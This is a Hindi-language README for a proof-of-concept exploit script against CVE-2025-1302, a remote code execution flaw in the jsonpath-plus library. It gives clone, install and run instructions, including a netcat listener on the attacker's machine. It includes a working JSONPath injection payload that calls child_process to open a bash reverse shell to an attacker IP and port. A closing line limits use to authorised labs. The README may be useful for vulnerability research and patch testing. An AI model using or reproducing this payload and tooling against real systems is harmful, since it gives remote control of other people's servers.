
jsonpath-plus में CVE-2025-1302 के लिए PoC एक्सप्लॉइट और असुरक्षित सर्वर डेमो
PoC स्क्रिप्ट का नाम: poc.py
CVE-2025-1302 के लिए एक proof-of-concept एक्सप्लॉइट स्क्रिप्ट, जो jsonpath-plus लाइब्रेरी में RCE भेद्यता को लक्षित करती है। जब इसे किसी संवेदनशील सेवा एंडपॉइंट के विरुद्ध चलाया जाता है, तो स्क्रिप्ट JSONPath पेलोड के माध्यम से रिमोट कोड एक्ज़ीक्यूशन ट्रिगर करने और हमलावर के पास वापस reverse shell स्थापित करने का प्रयास करती है।
--method या --no-fallback फ्लैग के माध्यम से POST, GET, या AUTO (GET फॉलबैक के साथ POST) का समर्थन करता है।{ip} और {port} टेम्प्लेटिंग होती है।tqdm प्रगति बार के साथ देरी और पेलोड लूप प्रदर्शित करता है।--output के साथ सभी परिणामों को JSON फ़ाइल में सहेजता है।इस रिपॉज़िटरी को क्लोन करें:
git clone https://github.com/yourorg/jsonpath-rce-poc.git
cd jsonpath-rce-poc
निर्भरताएँ स्थापित करें (Python 3.6+ आवश्यक है):
pip install -r requirements.txt
अपनी हमलावर मशीन पर एक लिसनर शुरू करें (आवश्यकतानुसार पोर्ट बदलें):
nc -lvnp 9999
PoC चलाएँ:
python3 poc.py \
--url http://TARGET_HOST:PORT/query \
--ip ATTACKER_IP --port 9999 \
[--payload-file payloads.txt] \
[--delay 5] \
[--method AUTO|POST|GET] \
[--no-fallback] \
[--output results.json]
--payload-file: फ़ाइल जिसमें प्रति पंक्ति एक JSONPath पेलोड हो। {ip} और {port} प्लेसहोल्डर का उपयोग करें।--delay: पेलोड भेजने से पहले प्रतीक्षा करने के लिए सेकंड (काउंटडाउन दिखाता है)।--method: POST, GET, या AUTO (डिफ़ॉल्ट) बलपूर्वक सेट करता है।--no-fallback: किसी भी GET पुनः प्रयास को छोड़ने के लिए शॉर्टहैंड (--method POST के बराबर)।--output: प्रयासों का JSON लॉग सहेजने का पथ।$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
इस स्क्रिप्ट का उपयोग केवल नियंत्रित प्रयोगशाला वातावरण में उन सिस्टमों के विरुद्ध करें जिनके स्वामी आप हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति है। दुरुपयोग अवैध और अनैतिक हो सकता है।